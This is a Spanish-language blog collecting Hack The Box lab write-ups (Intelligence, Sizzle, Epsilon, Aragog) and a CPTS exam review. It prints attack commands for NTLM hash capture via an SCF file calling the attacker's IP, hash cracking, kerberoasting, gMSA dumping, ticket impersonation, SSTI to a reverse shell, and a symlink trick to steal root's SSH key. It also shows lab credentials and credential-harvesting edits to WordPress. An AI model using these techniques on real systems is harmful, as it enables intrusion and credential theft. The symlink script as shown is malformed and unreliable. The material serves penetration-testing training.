Reconocimiento Inicial

Como siempre comenzamos con un scan de nmap hacia el host victima para identificar puertos abiertos:

Tenemos diversos puertos abiertos típicos de un AD. Lanzamos un nuevo scan para obtener más información de los servicios y versiones en estos puertos:

Podemos determinar en base a la captura el nombre del dominio (dc.intelligence.htb) fuera de eso no vemos información más relevante. Añadiremos el dominio encontrado al fichero /etc/hosts:

Reconocimiento Web

Ingresamos al servidor web:

Al investigar por la web no notamos nada particularmente interesante. Podemos visualizar 2 documentos disponibles 2020-01-01-upload.pdf y 2020-12-15-upload.pdf ubicados en http://intelligence.htb/documents:

Los documentos no tienen nada interesante en si, solo texto genérico:

Al descargarlos y analizar los metadatos con exiftool podemos identificar que tenemos 2 usuarios; William.Lee y Jose.Williams

exiftool documents.pdf

Vemos que al validar estos con crackmapexec no vemos si el usuario es valido o no, podemos utilizar Kerbrute para enumerar estos usuarios:

Como vemos son usuarios válidos, sin embargo no tenemos ninguna contraseña. Luego de agotar mis posibilidades buscando recursos en SMB con sesiones nulas decidí seguir buscando en el servidor web. Como pude obtener 2 usuarios validos de los PDF que descargue decidí revisar el directorio documents:

Como no es posible ingresar decidí construir un pequeño script en python el cual realice fuzzing sobre las fechas de los documentos con el fin de encontrar algún documento extra. (Es posible realizar esto con el intruder de Burp. Pero para fines prácticos decidí construir el script).

Fuzzing PDFs

Sabemos que los documentos que tenemos 2020-01-01-upload.pdf y 2020-12-15-upload.pdf comparten el mismo año (2020). Entonces solo recorreré los meses y días:

import requests
import itertools
from concurrent.futures import ThreadPoolExecutor

base_url = "http://intelligence.htb/documents/"
year = "2020"

meses = ["{:02d}".format(m) for m in range(1, 13)]
dias = ["{:02d}".format(d) for d in range(1, 32)]
fechas = itertools.product(meses, dias)

total_documentos = 0

def buscar_documento(fecha):
    global total_documentos
    url = f"{base_url}{fecha}-upload.pdf"
    response = requests.get(url)
    if response.status_code == 200:
        total_documentos += 1
        print(f"Documento encontrado: {url}")

with ThreadPoolExecutor(max_workers=10) as executor:
    executor.map(buscar_documento, [f"{year}-{mes}-{dia}" for mes, dia in fechas])

print(f"Total de documentos encontrados: {total_documentos}")

Al ejecutar el script y esperar a que finalice vemos como resultado un total de 84 documentos:

Hemos encontrado 84 documentos disponibles, si bien el script nos muestra todas las URL disponibles seria mucho trabajo entrar una por una y revisar su contenido además de tener que descargarlos para luego extraer la metadata y crear una lista de usuario. Además es posible que estos documentos contengan información relevante como detalles de cuentas o incluso contraseñas. Pero nada que un poco de scripting no solucione. El script final se encontrará en este repositorio para su uso libre:

Como se aprecia el resultado final del script muestra que en el documento 2020-06-04-upload.pdf se ha encontrado un texto relacionado a nuevas cuentas con la contraseña NewIntelligenceCorpUser9876. En el documento 2020-12-30-upload.pdf se habla de un usuario Ted que está almacenando un script en algún lugar.

Creando una lista de usuarios

Tenemos una contraseña valida y previamente hemos encontrado usuarios validos en los metadatos de los documentos. Ahora que contamos con 84 documentos vale la pena buscar más usuarios. El script almacena los documentos en una carpeta llamada “documentos”:

podemos utilizar exiftool en combinación con expresiones regulares para crear una lista de usuarios:

exiftool *.pdf | grep "Creator" | awk '{print $3}' | sort -u | tee users

Validación de usuarios con kerbrute

Observamos que al utilizar kerbrute para validar los usuarios todos los usuarios son validos en el sistema:

Con estos y una contraseña disponible podemos probar un ataque de Password Spraying para ver si la contraseña funciona para alguno de estos usuarios:

Password Spraying

Para realizar el ataque utilizare kerbrute de la siguiente forma:

Y el usuario “Tiffany.Molina@intelligence.htb” es válido. El mensaje de (Clock slow is too great) es porque nuestra hora no esta sincronizada con la del host victima. Podemos actualizar está con ntpdate:

SMB - Tiffany

Ya que tenemos credenciales realizare la enumeración del servicio smb:

Como vemos tenemos acceso de lectura a varias carpetas en las que destacan IT y Users. comenzare por observar el contenido de la carpeta Users. Al ingresar podemos ver que tenemos las carpetas de los usuarios en la que se encuentra la carpeta del usuario Ted.Graves. Recordemos que este está almacenando un script en algún lado.

smbclient //10.10.10.248/Users -U "Tiffany.Molina"

Vemos que no es posible listar el contenido de la carpeta del usuario Ted.Graves:

Al enumerar el recurso IT observamos un script en powershell llamado downdetector.ps1. Lo descargamos con get:

A continuación observamos el contenido del script:

Vemos que este script en PowerShell verifica el estado de los servidores web cuyos nombres comienzan con “web” en la zona DNS intelligence.htb. Finalmente Ted.Graves envía un correo electrónico si alguno de los servidores está caído. Teniendo todo esto en cuenta podemos utilizar la herramienta dnstool.py para realizar una consulta dns agregando un servidor web el cual no existe, con el fin de capturar la petición de la red con responder.

Hash - Ted.Graves

Iniciaremos responder con la configuración por defecto:

responder -I tun0

A continuación realizaremos la consulta con dnstool de la siguiente forma:

Al esperar los 5 minutos como indica el script downdetector.ps1 podemos ver que responder capturó un hash Net-NTLMv2 del usuario Ted.Graves:

Crackeando el hash

Procedemos a crackear el hash, utilizare hashcat y el diccionario de contraseñas rockyou:

hashcat -m 5600 ted_hash rockyou.txt

Ahora tenemos la contraseña **Mr.** del usuario **Ted.Graves**

Enum - Ted Graves

Luego de buscar con smb en el directorio del usuario algo interesante no pude dar con nada. Asi que utilizare bloodhound-python para enumerar el dominio:

Obtendremos algunos ficheros .json los cuales deberemos comprimir para poder subir a BloodHound. En mi caso utilice zip:

Cargamos el zip a BloodHound y seleccionamos en el Nodo de inicio al usuario Ted.Graves y presionamos click derecho sobre este y seleccionamos la opción Mark User as Owned:

Ahora seleccionamos Shortest Path from Owned Principals en la pestaña de Analysis

A continuación observamos que pertenecemos al grupo ITSUPPORT.

Siguiendo el flujo podemos ver que SVC_INT$@INTELLIGENCE.HTB es una cuenta de servicio gestionada por grupo. El grupo ITSUPPORT@INTELLIGENCE.HTB puede recuperar la contraseña de la GMSA del usuario SVC_INT$@INTELLIGENCE.HTB.

Finalmente vemos que el usuario SVC_INT$@INTELLIGENCE.HTB tiene el privilegio de delegación restringida a DC.INTELLIGENCE.HTB.

Obtención de hash NT de SVC_INT

Como sabemos gracias a bloodhound podemos leer la contraseña GMSA del usuario svc_int. Utilizare la herramienta gMSADumper para este proposito:

python3 gMSADumper.py -u 'ted.graves' -p 'Mr.<REDACTED>' -d 'intelligence.htb'

Shell as Admin

Siguiendo la ruta de BlooHound ahora podriamos solicitar un TGT para el usuario Administrador utilizando la herramienta getST de impacket:

impacket-getST -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :486b1ed222932<REDACTED> -impersonate administrator intelligence.htb/svc_int

Como vemos se ha almacenado el ticket en el fichero administrator.ccache podemos utilizar wmiexec de impacket para conectarnos realizando un “Pass The Hash” con el parametro -k. Lo primero que debemos hacer es exportar la variable KRB5CCNAME con el valor del ticket:

A continuación podemos realizar el procedimiento mencionado y leer la flag del usuario Administrator

Pwned! 🏴‍☠️

A continuación, comparto mi experiencia con esta certificación, abordando desde la preparación hasta la valoración final.

Preparación

Para poder rendir el examen, es necesario completar el PATH de Penetration Tester.

Sobre el material proporcionado, para mí es un 10 de 10. El contenido es directo y no se da vueltas innecesarias en aspectos que podemos profundizar por nuestra cuenta. Para mi esto fue crucial ya que me permitió concentrarme en los conceptos clave. Aún si tienes experiencia estoy seguro que aprenderás cosas nuevas incluso si creías que ya dominabas algunos conceptos de los módulos del path.

Además, el path es amigable para quienes están comenzando, ya que enseña desde conceptos básicos hasta avanzados, y los módulos se actualizan constantemente. Completar el PATH es prácticamente una obligación si deseas obtener la certificación; sin embargo, también lo recomiendo a aquellos que simplemente quieran aprender o afianzar conocimientos.

En cuanto a mi preparación, Tengo la fortuna de trabajar en el área de seguridad ofensiva y no he dejado de estudiar TTPs, nuevos ataques, herramientas, etc, desde hace un buen par de años lo que significa que he estado constantemente capacitandome. Esto me ayudó a sentirme fresco con la terminal. No quiero decir que se necesiten años de experiencia para estar listo y mucho menos estar trabajando en el campo de infosec, pero es fundamental familiarizarse con todo el contenido presentado en los módulos del PATH.

En mi caso, ya tenía experiencia en la mayoría de los módulos, excepto en Active Directory, por lo que reforcé esta área realizando máquinas de Active Directory de Hack The Box y tomando notas del módulo “Active Directory Enumeration & Attacks” de HTB Academy. Para quienes estén comenzando o tengan más “debilidades”, es útil realizar máquinas relacionadas con estos módulos. HTB Academy tiene una herramienta poderosa para facilitar este trabajo; por ejemplo, si necesitamos reforzar Pivoting, seleccionamos el módulo y se despliegan las máquinas relevantes:

El consejo que daría a quienes se están preparando para el examen es tener un enfoque estructurado y disciplinado. Es importante desarrollar la habilidad de administrar tu tiempo para trabajar de forma eficiente. Estudia de manera balanceada, duerme lo suficiente y toma descansos para mantenerte en óptimas condiciones durante la preparación y durante el transcurso del examen.

Asegúrate de conocer los temas y habilidades según el temario del examen. Aunque la práctica es crucial, no subestimes la importancia de la teoría. Un sólido entendimiento de los conceptos es esencial, así que toma buenas notas y crea tu propia CheatSheet.

Mi experiencia general

La verdad fue bastante desafiante para mí, ya que Active Directory no es mi día a día, pero logré certificarme con 100 puntos. En este último tiempo, he estado fortaleciendo mi conocimiento en infraestructura y redes, así como en Active Directory. Diría que no fue sencillo; sentí que el tiempo me presionaba constantemente. Casi sentí que estaba en una carrera contra el reloj. A pesar de la presión, la experiencia fue buena, ya que el laboratorio se mantuvo estable en todo momento.

Mi expectativa antes de comenzar era encontrarme con una cadena de ataque de las que solo Hack The Box sabe hacer. Si has tocado máquinas CTF en la plataforma de Hack The Box, sabrás a lo que me refiero. Me refería a una cadena de ataque en la que muchas veces tienes que pensar fuera de la caja. Sabía que sería un examen desafiante, el cual superó mis expectativas.

En cuanto a la dificultad del examen, creo que realmente dependerá de cuán afianzados tengas los conceptos presentados. Mi talón de Aquiles era Active Directory, por lo que enfoqué mi preparación en este aspecto (reflejado en mis últimos writeups). Sin ánimo de hacer spoiler, algunas explotaciones no eran complejas, más bien un poco rebuscadas; no a nivel descabellado, pero sí requerían pensar un poco fuera de la caja.

Sin duda, no es un examen sencillo. Utilicé los 10 días disponibles para el desarrollo del examen y del informe. Tomando mis descansos obviamente. A pesar de tener experiencia en CTFs, certificaciones y trabajo en el sector, no subestimaría la dificultad de esta certificación. Es desafiante y requiere preparación. El examen fue una cadena de ataque compleja y emocionante basado en un proyecto real. Por lo que a pesar de sentir que podia encontrar una missconfiguration en cualquier parte no senti la sensación de una dificultad artificial forzada en el transcurso del examen.

Finalmente mi reporte contuvo un total de 170 paginas, en mi caso utilice el template proporcionado por Hack The Box. Y luego de enviar el informe y esperar un par de semanas obtuve el certificado.

Conclusión

Para concluir, me gustaría realizar un pequeño PROS vs CONTRAS del examen. Pros:

• El examen es asequible y el contenido es excelente para su costo.
• Soporte prácticamente instantáneo; en mi caso, siempre estaban ahí cuando necesitaba ayuda con algun problema durante el desarollo de los laboratorios de los modulos. La eficiencia de las respuestas me sorprendió gratamente.
• El laboratorio se mantuvo estable en todos los ataques, y no experimenté pérdidas de conexión en ningún momento.

Contras:

• Puede sonar contradictorio dado el último PRO mencionado, pero hubo un punto en el examen en el que tuve que reiniciar el laboratorio más de tres veces. Esto me frustró un poco, ya que no sabía si estaba ante un rabbit hole o si mis payloads no funcionaban. Sin embargo, luego de un reinicio y probando el mismo ataque dio frutos. Por lo que el único contra del examen seria ese.

La certificación CPTS de Hack The Box es una excelente oportunidad para quienes buscan desafiarse y validar sus habilidades en pentesting. Sin duda el valor del contenido y la calidad de la enseñanza son indiscutibles.

Gracias por llegar hasta acá, Happy Hacking! 🏴‍☠️

Reconocimiento inicial

Para comenzar realizaremos un scan con nmap para detectar los puertos abiertos en el host victima:

nmap -sS --min-rate 1500 -p- --open -n -Pn -vv 10.10.10.103

Tenemos una buena cantidad de puertos abiertos. Realizamos otro scan para detectar las versión sobre los servicios detectados. En este caso ignorare los puertos más altos con servicio unknown

nmap -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001 10.10.10.103 -oN port_scan

De las capturamos podemos ver:

• Podemos iniciar sin credenciales al servidor ftp
• Servidor IIS 10.0 en puertos 80 y 443
• El servicio winrm está habilitado para conectarse con y sin ssl

Desde este punto comenzare enumerando el servidor ftp.

Recon - FTP

Nos conectamos como usuario Anonymous sin credenciales:

Al listar los recursos no tenemos resultados, y al intentar depositar un fichero se nos denegara el acceso:

Con esto en mente y sin mucha información enumerare el servidor web:

Recon - Web

Al ingresar por http solo se muestra un gif de bacon a la plancha:

Mediante https vemos lo mismo:

Fuzzing

Como no tenemos más que un bacon realizare fuzzing sobre los puertos encontrados comenzando por http. Utilizare la herramienta dirsearch para realizar esto:

dirsearch -u http://10.10.10.103/ -x 404,403 -t 100

Hemos encontrado un directorio relevante llamado certsrv el cual corresponde a AD el cual se utiliza para obtener certificados para utilizar con servidores Windows. Lamentablemente al ingresar a esta ruta notamos que se nos solicitan credenciales:

Si ingresamos mediante https tendremos el mismo resultado, por lo que no realizare fuzzing sobre este puerto ya que es probable que encuentre las mismas rutas.

Recon - SMB

Como no tenemos credenciales comenzaremos listando los recursos compartidos en smb con una Null Session:

Podemos ver que tenemos un recurso llamado CertEnroll el cual puede tener o no relación con la ruta en el servidor web. Tenemos otro recurso llamado Department Shares el cual no tiene comentarios al igual que el recurso Operations.

CertEnroll

Al conectarnos al recurso de CertEnroll con una Null Session se nos deniega el acceso:

Operations

Al ingresar en Operations podemos ver lo mismo:

Department Shares

Al conectarnos con una Null Session a Department Shares notamos que tenemos 20 directorios.

Para agilizar la tarea de inspección de estos directorios realizare una montura en mi maquina de atacante para traer estos directorios:

mkdir /mnt/department
mount -t cifs -o username=h4rri,password=''  '//10.10.10.103/Department Shares' /mnt/department

Al ingresar en /mnt/department podemos ver los directorios del recurso smb:

Al inspeccionarlos con tree notamos que el directorio Users contiene carpetas con nombres de usuarios los cuales utilizare posteriormente para validarlos. Además de el directorio ZZ_ARCHIVE el cual contiene ficheros de distintos tipos.

.
├── Accounting
├── Audit
├── Banking
│   └── Offshore
│       ├── Clients
│       ├── Data
│       ├── Dev
│       ├── Plans
│       └── Sites
< SNIP >
├── Users
│   ├── Public
│   ├── amanda
│   ├── amanda_adm
│   ├── bill
│   ├── bob
│   ├── chris
│   ├── henry
│   ├── joe
│   ├── jose
│   ├── lkys37en
│   ├── morgan
│   └── mrb3n
└── ZZ_ARCHIVE
    ├── AddComplete.pptx
    ├── AddMerge.ram
    ├── ConfirmUnprotect.doc
    ├── ConvertFromInvoke.mov
    ├── ConvertJoin.docx
    ├── CopyPublish.ogg
    ├── DebugMove.mpg
    ├── DebugSelect.mpg
    ├── DebugUse.pptx
    ├── DisconnectApprove.ogg
    ├── DisconnectDebug.mpeg2
    ├── EditCompress.xls

Al inspeccionar el contenido de los ficheros con strings notamos que no contienen nada y al utilizar xxd notamos que están llenos de null bytes:

cat *.ppt | xxd

0005e700: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0005e710: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0005e720: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0005e730: 0000 0000 0000 0000 0000 0000 0000 0000  ................
<SNIP>

→ Enumeración de usuarios validos

Ya que tenemos una recurso que contiene carpetas con nombres de usuarios crearemos una lista para poder enumerar usuarios validos en el AD. Para esto utilizare kerbrute:

kerbrute userenum -d htb.local --dc 10.10.10.103 users

Como podemos ver amanda es un usuario valido. Al intentar depositar un fichero en el directorio de amanda se nos denegará la acción:

A continuación enumerare los directorios en los cuales podría almacenar un fichero malicioso con el fin de que amanda u otro usuario conectado lo solicite para poder conseguir robar el hash NTLMv2.

SFC File Attack

Para automatizar este proceso utilizare el siguiente script con el fin de recorrer la lista de usuarios como directorios depositando el fichero test.txt hasta encontrar un directorio en el cual se nos permita depositar un fichero:

for user in $(cat users); do 
    directory="$user"
    if smbclient -D "\Users" -N -c "cd $directory; put test.txt; dir" "\\\\10.10.10.103\\Department Shares" > /dev/null 2>&1; then 
        if smbclient -D "\Users" -N -c "cd $directory; dir" "\\\\10.10.10.103\\Department Shares" 2>/dev/null | grep -q "test.txt"; then
            echo "El archivo fue depositado en el directorio $directory y tiene permisos de escritura."; 
        fi
    fi
done

Como se aprecia tenemos permisos de escritura sobre el directorio del usuario Public. Además luego de vigilar el fichero podemos notar que está siendo eliminado:

En base a esto creare un fichero SFC (Shell Command Files):

[Shell]
Command=2
IconFile=\\10.10.14.27\evil.ico
[Taskbar]
Command=ToggleDesktop

Como se ve se esta solicitando un fichero llamado evil.ico desde nuestra dirección IP asignada. Con esto, antes de depositarlo en /Users/Public iniciaremos responder para capturar el hash NTLMv2:

responder -I tun0

Depositamos el fichero:

Y al esperar un poco podemos ver que hemos recibido el hash de amanda:

Depositaremos el hash en un fichero para crackearlo, en este caso utilizare hashcat para hacerlo:

hashcat -m 5600 amanda_hash /usr/share/wordlists/rockyou.txt 

Podemos observar que el resultado nos muestra la contraseña Ashare1972. Podemos comprobar que estas credenciales son validas utilizando crackmapexec:

Y son validas contra smb, pero al probarlas contra winrm tenemos un error. Como vimos anteriormente con smbclient no pudimos acceder a los recursos CertEnroll y Operations. Así que ingresare nuevamente a estos recursos con las credenciales obtenidas:

De momento para CertEnroll no veo nada interesante con lo que poder aprovecharme. Para el recurso de Operations vemos lo mismo:

Si recordamos en el servidor web tenemos un panel de autenticación ubicado en https://10.10.10.103/certsrv:

Al ingresar podemos notar que estamos ante Microsoft Active Directory Certificate Services:

Shell as amanda

Anteriormente no pudimos conectarnos con las credenciales de amanda contra el servicio de winrm. Podemos generar un certificado para poder conectarnos con evil-winrm utilizando un certificado y una llave contra el puerto 5986 el cual corresponde al servicio winrm a través de SSL. Tenemos que generar una llave (fichero .key) y un fichero .csr el cual utilizaremos para generar el certificado:

openssl req -newkey rsa:2048 -nodes -keyout file.key -out file.csr

A continuación en la web presionamos en Request a certificate:

Ahora presionamos sobre advanced certificate request:

A continuación copiaremos el contenido del fichero file.csr en el sitio web:

Finalmente descargaremos el certificado en formato Base64 encoded. Finalmente utilizaremos el certificado y la llave para conectarnos con evil-winrm:

Al enumerar nuestros privilegios y pertenencias a grupos no vemos nada interesante:

Además la flag tampoco se encuentra en el directorio de nuestro usuario.

Enum - Bloodhound

Utilizare bloodhound-python para extraer la información de manera local para posteriormente cargarla en Bloodhound:

Una vez iniciado Bloodhound cargaremos el fichero .zip resultante de bloodhound-python, posteriormente marcaremos al usuario amanda como Owned presionando click derecho sobre el nodo y seleccionando Mark User as Owned:

Al presionar en la pestaña de Analysis podemos buscar por usuarios vulnerables a kerberoasting con el cual podamos obtener un ticket TGS:

Vemos que el usuario mrlky es vulnerable a kerberoasting. Antes de abusar de esto enumerare la forma más rápida de convertirse en Domain Admin:

Como vemos el usuario mrlky tiene la capacidad de realizar un ataque DCSync sobre HTB.LOCAL. En base a esto comenzare por abusar del kerberoasting sobre este usuario para posteriormente realizar un DCSync con el objetivo de obtener el hash del usuario Administrator.

Privesc

Comenzamos por solicitar el ticket TGS del usuario mrlky, para este caso utilizare Rubeus ya que al utilizar GetUserSPNs no tengo resultados positivos. Cargare Rubeus con evil-winrm en la carpeta de Temp:

Observamos que tenemos una restricción y no podemos utilizar evil-winrm para subir ficheros, además de que no podemos listar el contenido de la carpeta Temp, listare la politica de AppLocker para listar alguna ruta en la que podamos descargar contenido.

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Como se ve podemos realizar la ejecución de programas en la carpeta de Windows. Para esto creare una carpeta dentro de la misma carpeta Temp y depositare Rubeus en esta, Para esto montare un servidor con python para hostear el binario de Rubeus:

Kerberoasting - mrlky

Ahora realizaremos el ataque de kerberoasting con Rubeus sobre el usuario mrlky:

.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972 /nowrap /user:mrlky

Ahora depositaremos el hash en un fichero para crackearlo offline:

hashcat -m 13100 hash rockyou.txt

Observamos el resultado de la contraseña del usuario el cual es Football#7. Ahora estamos a un paso de obtener acceso como administrador.

DCSync

Sabemos que podemos realizar un DCSync sobre HTB.LOCAL asi que utilizare secretsdump para hacer esto de manera más eficiente:

Ya que obtuvimos los hashes de la base de datos del directorio activo podemos utilizar la tecnica de Pass The Hash para obtener una shell como usuario Administrador. Para este caso utilizare la herramienta psexec:

Ya con esto podemos leer las flags ubicadas en el directorio del usuario Administrator y mrlky.

Pwned! 🏴‍☠️

Reconocimiento

Para comenzar realizaremos un scan con nmap para visualizar los puertos abiertos en el host victima:

nmap -sS --min-rate 1500 -p- --open -vv -n -Pn 10.10.11.134

Vemos abiertos los puertos 22, 80 y 5000. Realizaremos otro scan para obtener más detalles de los servicios y versiones utilizados en estos puertos:

Podemos observar que el puerto 80 revela el directorio .git. Al ingresar al puerto 5000 http observamos que tenemos un panel de autenticación:

De momento no podemos hacer mucho en este panel.

Analizando .git

Como el resultado del script de nmap nos revelo el directorio .git en 10.10.11.134/.git podemos utilizar la herramienta Githack para recomponer este repositorio:

pip install githack

Como observamos contamos con 2 ficheros los cuales corresponden a server.py y track_api_CR_148.py. Analizaremos los ficheros individualmente.

server.py

Para server.py podemos notar que en las primeras líneas de código se evidencia el uso de Json Web Token además de que la aplicación estaría construida con Flask. Notamos que se verifica un JWT el cual hace uso del algoritmo HS256 para su construcción y recibe el username:

Al inspeccionar más el código notamos diversas rutas como /track y /order.

Las cuales si ingresamos en el puerto 80 no obtendremos resultados. Pero si tenemos resultados para el puerto 5000 lo que indica que el código fuente encontrado corresponde para este puerto en especifico:

track_api_CR_148.py

Para el fichero track_api_CR_148.py analizamos que también existen variables en forma de secreto. No tenemos estas claves pero si podemos ver que se revela el endpoint de AWS el cual es http://cloud.epsilon.htb. Agregamos este al fichero /etc/hosts de nuestra maquina.
Además vemos que se definen funciones las cuales Zipean una ruta de alguna forma. Adicionalmente tenemos el siguiente fragmento update_lambda el cual simplemente es una función que verifica la existencia de un directorio de Lambda y luego actualiza el código de la función utilizando la API de AWS Lambda.

Ya con esto en mente procedemos a enumerar los commits del proyecto utilizando git para observar distintas versiones de estos códigos.

Git Log

Utilizando el comando git log podemos ver los commits realizados. Observamos el primer commit (el de más abajo) el comentario de “Adding Tracking API Module” lo cual llama la atención ya que fue la primera implementación del código track_api_CR_148.py:
Podemos visualizar este utilizando el comando git show <commit>:

Vemos como se revelan los secretos para conectarse a aws:

aws_access_key_id=’AQLA5M37BDN6FJP76TDC’ aws_secret_access_key=’OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A’

Utilizaremos estos para explorar las funciones.

AWS

Lo primero es configurar AWS con los secretos utilizando aws configure:
Ya con esto podemos explorar las funciones, tengamos en cuenta que se nos mostrarón funciones lambda por lo que utilizaremos estás en aws:

aws --endpoint=http://cloud.epsilon.htb lambda list-functions

Observamos que tenemos la función costume_shop_v1 disponible. Podemos utilizar el siguiente comando para obtener la función:

aws --endpoint=http://cloud.epsilon.htb lambda get-function --function-name=costume_shop_v1

Y obtenemos la localización de la función la cual es un comprimido ZIP. Descargamos la función utilizando wget y la renombramos para convertirlo en un comprimido .zip y la descomprimimos para obtener el código:

Y observamos que esta contiene un secreto hardcodeado el cúal podriamos utilizar para crear un token JWT.

Creando JWT

Desde este punto ya que contamos con un secret podemos intentar crear un token JWT para su uso. Para esto utilizamos el siguiente script en python3:

import jwt
secret = "RrXCv`mrNe!K!4+5`wYq"
encoded_jwt = jwt.encode({"username": "admin"}, secret, algorithm="HS256")
print("[!] Token Generado: " + encoded_jwt)

Copiamos el token generado y lo utilizamos ante el puerto 5000 con el nombre de auth como vimos en el código server.py:

SSTI

Ahora que podemos explorar libremente observamos que en order podemos seleccionar un costume el cual si presionamos en order se despliega el mensaje de “Your order of “phantom” has been placed successfully.” En este caso al seleccionar el item de Phatnom Mask
Realizamos la misma petición pero esta vez con BurpSuite e identificamos que en el parámetro costume se pasa el valor de phantom:

Si cambiamos el valor de phantom por cualquier cosa como por ejemplo h4rri observamos que se muestra el valor de este:

Vemos que el valor se refleja correctamente. Sabemos por el script server.py que la aplicación está construida con Flask. Probamos un payload tipico para estos casos para probar la vulnerabilidad de Server-Side Template Injection el cual es `` si el resultado de este es 49 entonces estamos ante la vulnerabilidad mencionada:
Con la vulnerabilidad confirmada ya podemos buscar una forma de ejecutar comandos y obtener acceso a la maquina victima.

Shell as Tom

Para ganar acceso a la maquina victima podemos utilizar el siguiente payload:

Desde ya nos ponemos en escucha con netcat:
A continuación enviamos el payload en BurpSuite:


Desde este punto ya podemos leer la flag ubicada en el directorio del usuario tom.

Privesc

Al ejecutar Linpeas no observamos nada de mucho valor para escalar privilegios. Por lo que nos disponemos a enumerar procesos que no podamos ver utilizando la herramienta pspy. La descargamos en la maquina victima, le asignamos permisos de ejecución y la ejecutamos:

Observamos que el usuario root arranca una tarea cron y posteriormente ejecuta el script backup.sh ubicado en /usr/bin:

El script tiene el siguiente contenido:

La línea /usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar" crea un nuevo archivo comprimido en el directorio /var/backups/web_backups/.

El nombre del archivo es ${check_file}.tar, donde ${check_file} es el valor de la variable check_file. El contenido del archivo comprimido incluye el archivo /opt/backups/checksum y el archivo comprimido anteriormente creado /opt/backups/$file.tar.

Observamos además de que se está utilizando tar con el parámetro -h el cual según su descripción:

En base a esto podemos probar el crear un fichero en el directorio /opt/backups con el nombre de checksum el cual apunte directamente a la flag del usuario root o a la clave ssh del usuario root para ganar acceso al sistema con este. Para esto haremos uso de un script en python3 ya que la maquina victima cuenta con este lenguaje:

import os
while True:
	if os.path.exists("/opt/backups/checksum"):
		os.remove("/opt/backups/checksum")
		print("[+] File deleted")
os.symlink("/root/.ssh/id_rsa", "/opt/backups/checksum", target_is_directory=True)
print("[+] Symlink created")
break

Observamos que el script se ejecuto correctamente. Ahora copiamos el ultimo fichero tar creado al directorio tmp y lo descomprimimos:

Posteriormente ingresamos a la carpeta resultando la cual es opt y luego a backups:

Como apreciamos contamos con el fichero checksum, el cual si revisamos podemos notar que es una clave rsa para utilizar con SSH:

La copiamos y la guardamos en nuestra maquina de atacante. Le asignaremos permisos con chmod 600 para que contenga los permisos del propietario:
Observamos que tenemos acceso como usuario root, y ya podremos leer la flag:

Pwned! 🏴‍☠️

Reconocimiento Inicial

Para comenzar realizamos un scan con nmap para detectar los puertos abiertos del host victima:

nmap -sS --min-rate 1500 -p- --open -vv -n -Pn 10.10.10.78

Realizamos otro scan para detectar los servicios y versiones que se están utilizando en los puertos detectados:

nmap -sCV -p21,22,80 10.10.10.78

Observamos que en el escaneo resultante podemos ingresar de forma anónima al FTP. Además de que en el servicio HTTP se esta redirigiendo hacia el dominio aragog.htb por lo que añadimos este al fichero hosts de nuestra maquina. Al ingresar al servicio FTP podemos identificar el fichero test.txt. Lo descargare para visualizar su contenido:

Al ver el el contenido del fichero notamos que se asemeja al de la estructura XML. Además de contener una mascara de red en el detalle. De momento no tenemos un uso en particular para este fichero:

Reconocimiento Web

Desde este punto al ingresar al servicio HTTP podemos ver una pagina por defecto del servidor de Apache:

Generalmente los servidores Apache utilizan el lenguaje de programación PHP. Para realizar fuzzing de está extensión y encontrar posibles ficheros utilizare la herramienta wfuzz. Utilizaremos 2 payloads, uno para descubrir rutas y otro para mezclar estas rutas con las extensiones html,php y txt:

wfuzz -c --hc=404 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,html-php-txt -u http://aragog.htb/FUZZ.FUZ2Z -t 200

Observamos que se ha encontrado el fichero hosts.php:

Ingresamos a este mediante el navegador y podemos ver el mensaje de “There are 4294967294 possible hosts for”

Detectando XXE

Algo que podemos probar con el fichero descargado desde el servidor FTP es enviarlo como data al servidor HTTP. Podemos realizar esto con curl:

Y como vemos nos entrega un resultado distinto. Con esto podemos pensar que el script host.php sirve como una calculadora de subredes. Podemos enviarlo directamente en BurpSuite cambiando la IP para probar si realiza la misma operación y nos entrega un resultado distinto:

Y vemos que efectivamente no solo nos entrega un resultado distinto para la mascara si no que además esta interpretando el contenido del fichero en formato XML. Desde este punto podemos intentar realizar una inyección XXE básica para recuperar algún fichero interno de la maquina como seria el fichero /etc/passwd
Y tenemos la capacidad de realizar una inyección XXE.

Shell as Florian

Ya que la vulnerabilidad esta confirmada podemos intentar recuperar la llave id_rsa de alguna de los usuarios del sistema que cuentan con una bash. Para este caso en particular tenemos 3 usuarios: root, florian y cliff. Como puede ser obvio lo más seguro es que si intentamos recuperar la id_rsa del usuario root no podremos, por lo que veremos si podemos recuperar el id_rsa de florian o cliff. En este caso no tenemos resultados con el usuario cliff:

Pero con el usuario florian es un caso distinto y obtenemos una id_rsa que nos servirá para conectarnos a la maquina victima:

Es importante que la llave id_rsa contenga los permisos necesarios para conectarnos por lo que debemos modificarlos con chmod:

chmod 600 id_rsa

Ya tenemos acceso.

Privesc

Para la escalada de privilegios utilice linpeas el cual revela ficheros que han sido modificados en los últimos 5 minutos los cuales corresponden a ficheros de WordPress ubicados en /var/www/dev_wiki:

Al ingresar mediante el navegador observamos que efectivamente hay un wordpress ejecutandose:

Llama la atención que los ficheros hayan sido modificados en los últimos 5 minutos por lo que utilizaremos la herramienta pspy para observar si se están ejecutando comandos que no podamos detectar:

Observamos en el output de pspy que el grupo de procesos que se inicia cada cinco minutos llama a /root/restore.sh, lo que parece reiniciar el sitio de wordpress. Además de un fichero wp-login.py el cual está siendo ejecutado por el usuario cliff. Con esto podemos llegar a conclusión de que se esta autenticando el usuario cliff. Como tenemos permisos de escritura en los ficheros del servidor de wordpress podemos intentar modificar alguno de estos para que al momento de que se realice la autenticación del mismo, escribir en un fichero aparte las credenciales ingresadas del usuario en cuestión. Esto lo podemos lograr modificando el fichero user.php en wp-includes:

Ahora incluimos el siguiente fragmento de código para depositar un fichero que llamaremos hijack.txt el cual contendrá por una parte log que corresponde al nombre de usuario y pwd el cual corresponde a la contraseña del mismo:

